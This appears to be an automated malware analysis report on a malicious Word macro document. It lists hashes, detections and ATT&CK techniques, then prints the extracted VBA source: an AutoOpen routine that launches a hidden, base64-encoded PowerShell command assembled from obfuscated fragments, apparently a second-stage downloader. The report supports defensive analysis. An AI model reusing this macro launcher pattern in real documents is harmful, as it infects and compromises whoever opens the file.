Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce5de83fdbcf54a2…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 110.0 KB
Created: 2018-05-29 15:04:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 43beed656321a00db996265178a90822
SHA-1: e2059c04f7dd89530e1b798a0a637832781cccb2
SHA-256: ce5de83fdbcf54a2677fa6e970e7048807f21aaab8717a88f27602df96f2ca46
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros whose Autoopen routine leads to a Shell() call. Shell() is used to launch a PowerShell command that the macro assembles from concatenated string fragments and passes with -e (an encoded command). The reconstructed PowerShell command is 'powershell -windowsstyle hidden -e IAAoACgAKAAiAHsAOAA0AH0Ae wAxADAAOAB9AHsAOAA5A fQB7ADYANgB9AHsAM wA3AH0Ae wAxADcAfQB7ADE AMAA2AH0', which is likely responsible for downloading and executing a second-stage payload. This is consistent with a macro-based downloader pattern.

Heuristics (7)

  • ClamAV: Doc.Malware.Juhr-10058934-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Juhr-10058934-0
  • VBA macros detected [medium; 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14924 bytes
SHA-256: 5d89fe795e42f5f08a56670e0c47c1f76c9f3b6faca0dfc42ab9b030e7522867

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "WFzFwHrJX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ikRjQniTL()
On Error Resume Next
nsUGi = Fix(53706 / CSng(80906) * PIltF * RiLms)
VhBn = CDate(80578)
QPuoiK = Fix(80709 / CSng(93410) * upsDK * BmimLL)
VhBn = CDate(83275)
ikRjQniTL = wcCAlE + wYoRlGfWI + KjSNAtOAt + aWHaQ + HoiASmATm + VSwccpzz + wnPhLa + wkuSw + bSsFImSYEBJ
bIvAT = Fix(40364 / CSng(93111) * jvdXcZ * ERAUP)
VhBn = CDate(26536)
End Function
Sub Autoopen()
On Error Resume Next
BCNWcY = Fix(16344 / CSng(10987) * UZwTfi * VbEAI)
VhBn = CDate(93646)
JzXaNvQiJlj (ikRjQniTL)
nSbUa = Fix(40111 / CSng(21338) * cCiHsm * sXkaRJ)
VhBn = CDate(95960)
End Sub
Function JzXaNvQiJlj(VvEwopHVzm)
On Error Resume Next
GmVIis = Fix(21222 / CSng(24733) * EdaEBE * kTczwp)
VhBn = CDate(46546)
CiIwbo = QjAkW + Shell(ZPHNkBBnX + (Chr(vbKeyP)) + tpVOi + VvEwopHVzm + ZijORNUY, vBhhPvZkj + vbHide + JmJTF)
XYjjQh = Fix(60936 / CSng(31504) * oViEMj * RpqCPM)
VhBn = CDate(85004)
End Function


Attribute VB_Name = "TCqzjAhROfkFI"
Function wcCAlE()
On Error Resume Next
lkcbrT = Fix(88585 / CSng(88949) * Xocnf * zuEBoi)
VhBn = CDate(39990)
JzNNb = "owersHeLL" + " -WinDo" + "wsTyle hid" + "den -e " + "IAAoACgAKAAi" + "AHsAOAA0AH0Ae" + "wAxAD" + "AAOAB9AHsAOAA5A"
liPSQQ = Fix(14883 / CSng(10233) * jdZdD * fLXiB)
VhBn = CDate(66615)
hVJJnWI = "H0AewAxADg" + "AfQB7AD" + "YANgB9AHsAM" + "wA3AH0Ae" + "wAxADcAfQB7"
ESYMQ = Fix(19807 / CSng(60418) * RHQtr * cAdiFS)
VhBn = CDate(39776)
mRFzoVfzcbF = "ADIANQ" + "B9AHsAN" + "QA2AH0Aew" + "A5ADkAfQB7ADE" + "AMAA2AH0"
KFLuVZ = Fix(81817 / CSng(32307) * TIliw * EzzZKS)
VhBn = CDate(42856)
JlPtsd = "AewA0ADcA" + "fQB7ADEAMwAwA" + "H0AewA" + "0AH0AewA" + "2ADQAf" + "QB7AD" + "EAMgAwAH" + "0AewA4ADUAfQ" + "B7ADcANgB9AHsAO" + "AAzAH0AewA"
jMjDK = Fix(88221 / CSng(537) * QfLISA * oGTAH)
VhBn = CDate(93806)
ZUZAmofrZ = "zADMAfQB7ADEAM" + "gA5AH0Ae" + "wA5AD" + "cAfQB7ADEAMQ" + "A0AH0AewAxADkAf" + "QB7ADkAN" + "gB9AHsAN" + "wB9AHsAMQAwADMA" + "fQB7ADEAMA" + "A1AH0"
FNfGZi = Fix(15649 / CSng(85509) * anwbi * VfWzXr)
VhBn = CDate(10636)
WwLKsiciqL = "AewA2ADAA" + "fQB7ADIAMAB9AHs" + "AOQAzAH0AewAxAD" + "UAfQB7ADgANwB9A" + "HsANAAy" + "AH0AewA1ADEA" + "fQB7ADcANAB9"
obDiI = Fix(37786 / CSng(83029) * OMwGS * EUWnX)
VhBn = CDate(40843)
ACGPTzzXnjd = "AHsANwA5AH" + "0AewAxADAAOQB" + "9AHsANw" + "A1AH0AewAx" + "ADEAMQB9AHsAMgA" + "zAH0AewA0A" + "DEAfQB7A" + "DAAfQB7AD" + "IANgB9AHsAM"
UWZnAk = Fix(75937 / CSng(57005) * ZtAuq * WzzYTI)
VhBn = CDate(48173)
KzjjQFTnmEi = "gAxAH0Aew" + "A1ADkA" + "fQB7AD" + "EAMgA0AH0" + "AewAxADAAMAB9A"
dbWwbC = Fix(56852 / CSng(69513) * khUEi * IjDoHn)
VhBn = CDate(8466)
joNhLCmm = "HsAMQ" + "AzAH0AewA0ADQ" + "AfQB7ADYAO" + "QB9AHs" + "AMwAxAH" + "0AewA0" + "ADMAfQB7ADIANw" + "B9AHsANQA" + "wAH0Aew" + "AxADIANwB9AHs"
XhZwW = Fix(76851 / CSng(98057) * cvmvL * mMbioZ)
VhBn = CDate(30937)
jETjR = "AMgA5AH" + "0AewA5AH0AewA5A" + "DAAfQB7ADkANA" + "B9AHsAMgA0AH0A" + "ewA0ADAAf" + "QB7ADEAMQA5AH0" + "AewA1A"
wcCAlE = JzNNb + hVJJnWI + mRFzoVfzcbF + JlPtsd + ZUZAmofrZ + WwLKsiciqL + ACGPTzzXnjd + KzjjQFTnmEi + joNhLCmm + jETjR
End Function
Function wYoRlGfWI()
On Error Resume Next
VarIr = Fix(79871 / CSng(29889) * RwYVw * CEHwU)
VhBn = CDate(65931)
hTBZr = "DgAfQB" + "7ADcAMQB9A" + "HsANAA2A" + "H0AewAyADIAfQB" + "7ADYANQB9AHsAN"
ZSifi = Fix(94314 / CSng(83375) * dwipK * wGNwJ)
VhBn = CDate(73979)
CRGXYHakAzE = "gAxAH0AewA3A" + "DAAfQ" + "B7ADQAOQB9AHsAM" + "QAyADEAfQB7AD" + "cAOAB9AHsAMQ" + "AxADgAfQ" + "B7ADMANg" + "B9AHsAMQAyAH0Ae" + "wA4ADgA" + "fQB7ADEANgB9AH"
dpWpf = Fix(40779 / CSng(19604) * WsEhI * IJcMsY)
VhBn = CDate(14348)
bGFuhiKDYZ = "sANQA" + "yAH0Ae" + "wA1ADMAfQ" + "B7ADMAf" + "QB7ADgANg" + "B9AHsAMQAwADcA"
zujoFD = Fix(96129 / CSng(86965) * LvzwcL * zbhqGF)
VhBn = CDate(49136)
miickwltGit = "fQB7A" + "DEAMQA3AH0" 
... (truncated)